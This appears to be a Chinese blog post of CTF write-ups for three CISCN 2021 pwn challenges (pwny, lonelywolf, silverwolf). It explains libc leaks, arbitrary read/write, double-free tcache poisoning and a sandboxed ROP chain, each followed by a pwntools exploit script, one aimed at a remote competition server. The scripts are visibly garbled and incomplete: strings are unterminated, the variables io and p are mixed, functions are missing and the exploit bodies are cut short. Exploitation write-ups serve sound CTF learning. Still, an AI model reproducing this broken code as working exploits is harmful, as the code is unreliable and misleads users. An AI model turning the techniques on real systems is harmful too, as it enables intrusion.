博客
关于我
ciscn2021西北部分pwn
阅读量:677 次
发布时间:2019-03-17

本文共 2337 字,大约阅读时间需要 7 分钟。

打了一天的国赛,发现自己还是太菜了

pwny

在分析程序时,发现可以通过读取随机数到bss段上作为文件描述符范围,在0~0xff之间。随后,在自定义的函数sub_ba0中发现可以根据偏移进行任意写的操作,sub_b20则允许根据偏移进行任意读操作。这使得我们能够覆盖fd的值,将其设置为0,从而实现在文件描述符上进行任意读写操作。

为了达到这个目的,我们首先需要通过泄露出bss段上的stdout指针来获得_IO_2_1_stdout_的地址,从而推导出libc的基地址。随后,利用data段上的off_202008泄露bss段的地址,进一步通过libc中的environ变量泄露栈地址。通过这些信息,可以将onegadget链写到栈上的返回地址中,获得最终的shell控制。然而,直接使用(exp)函数进行远程调试会被防护措施阻止。解决方案是在二进制程序中直接将fd设置为0,从而方便进行调试。

代码示例如下:
from pwn import *
io = process('./pwny')
elf = ELF('./pwny')
libc = elf.libc
context(log_level='debug')
def read():
io.recvuntil('Your choice: ')
io.send('1 ')
io.recvuntil('Index: ')
def write(a1):
io.recvuntil('Your choice: ')
io.send('2 ')
io.recvuntil('Index: ')
def exp():
write(256)
gdb.attach(io)
read()
# 撰写exp函数的具体实现,确保能够获得libc基地址和其他所需信息

通过上述方法,我们能够成功地获取到libc的基地址、system函数的地址以及最终的binsh地址,从而实现shell控制。这一过程展示了如何在实际编程中应对各种防护机制,并利用细节来实现漏洞利用。

lonelywolf

在处理这个问题时,发现漏洞在dele函数中没有正确清空free后的指针,导致doublefree的问题。一旦触发这个漏洞,可以通过控制tcache_struct和free_cache_struct的count值来泄露libc的基地址。随后,通过修改fd指针的值,利用free_hook和__free_hook-0x8的位置,进一步获取到shell控制。

代码示例如下:
from pwn import *
io = remote('124.70.20.79', 22175)
def add(a1, a2):
io.sendafter('Your choice: ', '1 ')
io.sendafter('Index: ', str(a1) + ')
def edit(a1, a2):
io.sendafter('Your choice: ', '2 ')
io.sendafter('Index: ', str(a1) + ')
def show(a1):
io.sendafter('Your choice: ', '3 ')
io.sendafter('Index: ', str(a1) + ')
def dele(a1):
io.sendafter('Your choice: ', '4 ')
def exp():
add(0, 96)
dele(0)
edit(0, p64(0) * 2)
dele(0)
show(0)
heapbase = u64(io.recv(6).ljust(8, '\x00')) - 0x200 - 0x400 + 0x800

silverwolf

这是一个沙箱堆题,libc版本为2.27。通过仔细分析程序逻辑,发现可以利用heapchunk的可写大小(通常为0x78)来构造rop链。具体来说,利用environ变量将一个chunk申请到栈上,再通过修改返回地址实现控制。这一过程需要注意open函数的实现方式,避免因沙箱效应无法绕过。但在实际操作中,可能需要多次尝试才能找到最优解法。

代码示例如下:
from pwn import *
io = process('./silverwolf')
elf = ELF('./silverwolf')
libc = elf.libc
context.terminal=['tmux','splitw','-h']
def menu(ch):
p.sendlineafter('choice:', str(ch))
def add(size):
menu(1)
p.sendlineafter('Index:', '0')
p.sendlineafter('Size:', str(size))
def edit(content):
menu(2)
p.sendlineafter('Index:', '0')
p.sendlineafter('Content:', content)
def show():
menu(3)
p.sendlineafter('Index:', '0')
def exp():
add(0x78)
dele(0)
edit('./flag\x00')
add(0x78)
add(0x78)
edit('\x00'*0x23 + '\x07')
dele(0)
show(0)
heapbase = u64(p.recv(6).ljust(8, '\x00')) - 0x1880 - 0x940 - 0x70

转载地址:http://jxgqz.baihongyu.com/

你可能感兴趣的文章
Mysql学习总结(77)——温故Mysql数据库开发核心原则与规范
查看>>
Mysql学习总结(78)——MySQL各版本差异整理
查看>>
Mysql学习总结(79)——MySQL常用函数总结
查看>>
Mysql学习总结(7)——MySql索引原理与使用大全
查看>>
Mysql学习总结(80)——统计数据库的总记录数和库中各个表的数据量
查看>>
Mysql学习总结(81)——为什么MySQL不推荐使用uuid或者雪花id作为主键?
查看>>
Mysql学习总结(82)——MySQL逻辑删除与数据库唯一性约束如何解决?
查看>>
Mysql学习总结(83)——常用的几种分布式锁:ZK分布式锁、Redis分布式锁、数据库分布式锁、基于JDK的分布式锁方案对比总结
查看>>
Mysql学习总结(84)—— Mysql的主从复制延迟问题总结
查看>>
Mysql学习总结(85)——开发人员最应该明白的数据库设计原则
查看>>
Mysql学习总结(8)——MySql基本查询、连接查询、子查询、正则表达查询讲解
查看>>
Mysql学习总结(9)——MySql视图原理讲解与使用大全
查看>>
Mysql学习笔记 - 在Centos7环境下离线安装Mysql
查看>>
MySQL学习笔记十七:复制特性
查看>>
Mysql学习第一课-mysql的定义及sql语句
查看>>
mysql学号的字符长度_MYSQL--2
查看>>
mysql安全模式: sql_safe_updates
查看>>
mysql安装,卸载,连接
查看>>
MySQL安装之没有配置向导
查看>>
mysql安装出现 conflicts with mysql*的解决办法
查看>>